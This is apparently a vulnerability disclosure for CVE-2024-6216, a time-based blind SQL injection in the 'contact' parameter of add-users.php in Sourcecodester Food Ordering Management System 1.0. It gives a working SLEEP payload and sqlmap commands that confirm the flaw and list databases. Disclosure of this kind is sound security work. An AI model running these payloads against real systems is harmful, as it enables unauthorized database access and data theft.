Skip to content

Latest commit

 

History

History
57 lines (34 loc) · 2.04 KB

SourceCodester_Food_Ordering_Management_System_add_users_Sqli.md

File metadata and controls

57 lines (34 loc) · 2.04 KB

SQL Injection vulnerability was discovered from Sourcecodester Food Ordering Management System 1.0 (add-users.php)

CVE-2024-6216

Affected Project: Sourcecodester Food Ordering Management System 1.0 Official Website: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html Version: 1.0

Related Code file: add-users.php

Injection parameter: contact

Vulnerability Analysis

  1. Lack of Input Validation and Sanitization: The contact parameter fields are directly used in the SQL query without any sanitization or validation. This allows an attacker to manipulate the SQL query by injecting malicious SQL code.

  2. Use of Plain SQL Queries: The script likely uses plain SQL queries to interact with the database. Without prepared statements, this approach is highly vulnerable to SQL injection.

Demonstraation

Below is the users.php. By clicking on Add on the right bottom side, we can access add-user.php.

http://172.16.76.1/foms/user.php

image

We will first intercept the traffic using Burp Suite:

image

Save the intercepted login request to a .txt file and execute sqlmap towards it.

parameter contact is vulnerable to time-based blind sql injection

Below commands verifies the vulnerability:

sqlmap -r foms-add-users-php.txt --batch

image

---
Parameter: contact (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=sdf&password=sdf&name=sdf&email=tese@sdf.cd&contact=123 AND (SELECT 5585 FROM (SELECT(SLEEP(5)))zByJ)&address=123&role=Customer&verified=0&deleted=0&action=
---

Below commnd will list databases:

sqlmap -r foms_login_php.txt --batch -p contact --dbs

image